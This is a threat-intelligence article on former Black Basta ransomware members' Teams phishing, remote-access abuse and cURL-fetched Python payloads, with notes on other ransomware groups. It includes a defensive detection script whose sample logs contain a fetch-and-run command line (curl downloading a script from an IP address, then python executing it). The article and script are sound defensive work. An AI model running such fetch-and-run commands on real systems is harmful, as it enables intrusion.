The Evolving Tactics of Former Black Basta Members
Background of Black Basta
Former operatives associated with the notorious Black Basta ransomware group are reportedly shifting their techniques while continuing to exploit weaknesses in corporate security systems. Their recent activity reveals a trend towards utilizing email bombardment and Microsoft Teams phishing, which allows these cybercriminals to maintain long-term access to targeted networks.
New Techniques in Cyber Attacks
Recent analyses by ReliaQuest have uncovered that these attackers are now incorporating Python scripts into their malicious strategies. This involves the use of cURL requests to deploy harmful payloads, marking an evolution in their attack methodology. Reports indicate that despite setbacks following the leak of internal chat logs in February 2025, these attackers are adapting and regrouping effectively.
Phishing Techniques and Target Analysis
Between February and May 2025, approximately 50% of Teams phishing attacks originated from onmicrosoft[.]com domains. A further 42% came from domains that had already been compromised, which makes those messages especially hard to spot. Both methods let attackers blend in with legitimate email traffic, making it harder for organizations to discern the threats.
Notably, victims within the finance, insurance, and construction sectors were specifically targeted through Teams phishing attempts masquerading as help desk representatives. Such tactics are not only alarming but also indicative of a premeditated strategy aimed at deceiving unsuspecting employees.
Aftermath of Black Basta
In light of the shutdown of Black Basta’s data-leak site, cybersecurity experts speculate that former members may have either pivoted to a different Ransomware-as-a-Service (RaaS) group or established a new organization altogether. One possibility is a connection to the CACTUS RaaS group, hinted at through references to large payments in leaked communications among Black Basta leaders.
Interestingly, since March 2025, CACTUS has not disclosed any new organizations on its data leak platform, which could point to a deliberate strategy to avoid detection. Another theory is that some affiliates may have joined forces with BlackLock, which appears to have affiliations with a ransomware cartel known as DragonForce.
Leveraging Access for Additional Attacks
Recently observed actions demonstrate that attackers are capitalizing on the access gained through Teams phishing to initiate remote desktop sessions using Quick Assist and AnyDesk tools. Once inside, they can download and execute malicious Python scripts from remote locations, establishing command-and-control (C2) communications with their target systems.
This newfound reliance on Python scripts represents a concerning trend likely to gain traction in future Teams phishing campaigns, according to cybersecurity experts. The strategy, akin to the Black Basta playbook, combines email spam and Teams phishing tactics alongside remote access applications.
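The two observations above, lures arriving from onmicrosoft[.]com tenants and, after the victim accepts a Quick Assist or AnyDesk session, a cURL download followed by a Python execution, give a defender a simple chain to correlate. The following detection script is an added example and is not from the original article or from ReliaQuest; the key=value log format, the sample events, the host and sender names, the 203.0.113.10 address and the one-hour correlation window are all constructed assumptions, as are the process image names used for the remote-access tools.

```python
import re
from datetime import datetime, timedelta

# Process names to watch for, as assumptions about how the tools named in
# the article appear in endpoint telemetry (Quick Assist and AnyDesk).
REMOTE_ACCESS_TOOLS = {"quickassist.exe", "anydesk.exe"}
# Second-stage tooling the article describes: cURL pulling a Python payload.
STAGER_TOOLS = {"curl.exe", "python.exe", "python3.exe", "pythonw.exe"}
# How long each stage may follow the previous one (assumed value).
WINDOW = timedelta(hours=1)

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed sample telemetry, not real logs: one host shows the full chain,
# the other shows a benign external Teams chat plus an unrelated python run.
SAMPLE_EVENTS = [
    r'2025-04-02T09:14:03Z host=WS-FIN-07 user=jdoe kind=teams_message sender=helpdesk@contoso-support.onmicrosoft.com external=true',
    r'2025-04-02T09:21:48Z host=WS-FIN-07 user=jdoe kind=process image=C:\Windows\System32\quickassist.exe',
    r'2025-04-02T09:33:10Z host=WS-FIN-07 user=jdoe kind=process image=C:\Windows\System32\curl.exe cmdline="curl.exe -o C:\Users\Public\update.py http://203.0.113.10/update.py"',
    r'2025-04-02T09:33:15Z host=WS-FIN-07 user=jdoe kind=process image=C:\Python312\python.exe cmdline="python.exe C:\Users\Public\update.py"',
    r'2025-04-02T10:05:00Z host=WS-ENG-02 user=asmith kind=teams_message sender=colleague@partner.example external=true',
    r'2025-04-02T11:12:00Z host=WS-ENG-02 user=asmith kind=process image=C:\Python312\python.exe cmdline="python.exe build.py"',
]


def parse_event(line):
    """Parse one 'timestamp key=value ...' line into a dict (quoted values allowed)."""
    ts_text, _, rest = line.partition(" ")
    event = {"ts": datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ")}
    for key, quoted, bare in KV_RE.findall(rest):
        event[key] = quoted if quoted else bare
    return event


def is_suspicious_teams_sender(sender):
    """True for senders on a default *.onmicrosoft.com tenant domain."""
    domain = sender.rsplit("@", 1)[-1].lower()
    return domain == "onmicrosoft.com" or domain.endswith(".onmicrosoft.com")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_phishing_chains(lines, window=WINDOW):
    """Correlate a suspicious external Teams message with later remote-access and
    stager process launches on the same host. Returns one finding per lure, with
    stage 1 (lure only), 2 (plus remote-access tool) or 3 (plus curl/python)."""
    events = sorted((parse_event(l) for l in lines), key=lambda e: e["ts"])
    findings = []
    for i, lure in enumerate(events):
        if lure.get("kind") != "teams_message" or lure.get("external") != "true":
            continue
        if not is_suspicious_teams_sender(lure.get("sender", "")):
            continue
        host = lure["host"]
        chain = {"host": host, "user": lure.get("user"), "sender": lure["sender"],
                 "remote_tool": None, "stager": None}
        deadline = lure["ts"] + window
        for ev in events[i + 1:]:
            if ev["ts"] > deadline:
                break
            if ev["host"] != host or ev.get("kind") != "process":
                continue
            name = basename(ev.get("image", ""))
            if chain["remote_tool"] is None and name in REMOTE_ACCESS_TOOLS:
                chain["remote_tool"] = name
                deadline = ev["ts"] + window  # the stager window starts at the RAT launch
            elif chain["remote_tool"] and chain["stager"] is None and name in STAGER_TOOLS:
                chain["stager"] = ev.get("cmdline", name)
                break
        chain["stage"] = 1 + bool(chain["remote_tool"]) + bool(chain["stager"])
        findings.append(chain)
    return findings


if __name__ == "__main__":
    for finding in find_phishing_chains(SAMPLE_EVENTS):
        print(f"stage {finding['stage']} on {finding['host']} ({finding['user']}): "
              f"lure from {finding['sender']}, tool={finding['remote_tool']}, stager={finding['stager']}")
```

Run on the constructed events it reports a stage-3 chain on WS-FIN-07 and nothing for WS-ENG-02, whose external message came from a normal partner domain. A stage-1 hit alone is only a triage signal, since legitimate tenants also use onmicrosoft.com addresses; the remote-access launch and the curl-to-python handoff are what raise it to an incident.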
The Rise of BlackSuit Ransomware
In a troubling development, the social engineering strategies employed by Black Basta have been adopted by the BlackSuit ransomware group. This crossover suggests a possible merging of tactics or even the integration of members between these groups.
Research by Rapid7 suggests that the initial access obtained through these attacks serves as a gateway to downloading and executing advanced variants of Java-based Remote Access Trojans (RATs), which were previously a hallmark of Black Basta operations. The current malware uses cloud services from Google and Microsoft to facilitate its operations, an alarming increase in sophistication.
Current Developments in the Ransomware Landscape
The ransomware landscape is witnessing various shifts as multiple groups intensify their operations. Notably, the financially motivated Scattered Spider group is orchestrating campaigns against managed service providers (MSPs) and IT vendors, employing a "one-to-many" approach to infiltrate multiple organizations with a single breach. They exploit compromised accounts from major contractors to gain entry.
Additionally, the Qilin group has been actively targeting organizations by weaponizing vulnerabilities in Fortinet products. Meanwhile, the Play ransomware group has been linked to a wave of attacks on numerous entities since mid-2022, using various vulnerabilities to gain footholds.
In a particularly noteworthy leak, internal conflicts within the VanHelsing group have led to the exposure of its source code, revealing everything from the TOR keys to the ransomware's functionality.
Conclusion
As cyber threats evolve, Remote Access Trojans (RATs) are becoming increasingly central to attackers' operations. These tools provide the ability to control infected systems remotely, allowing cybercriminals to exfiltrate data, monitor activity, and introduce additional malware into the environment. This adaptability and continuous evolution of tactics are a cause for concern among cybersecurity professionals, necessitating proactive defenses against an ever-changing threat landscape.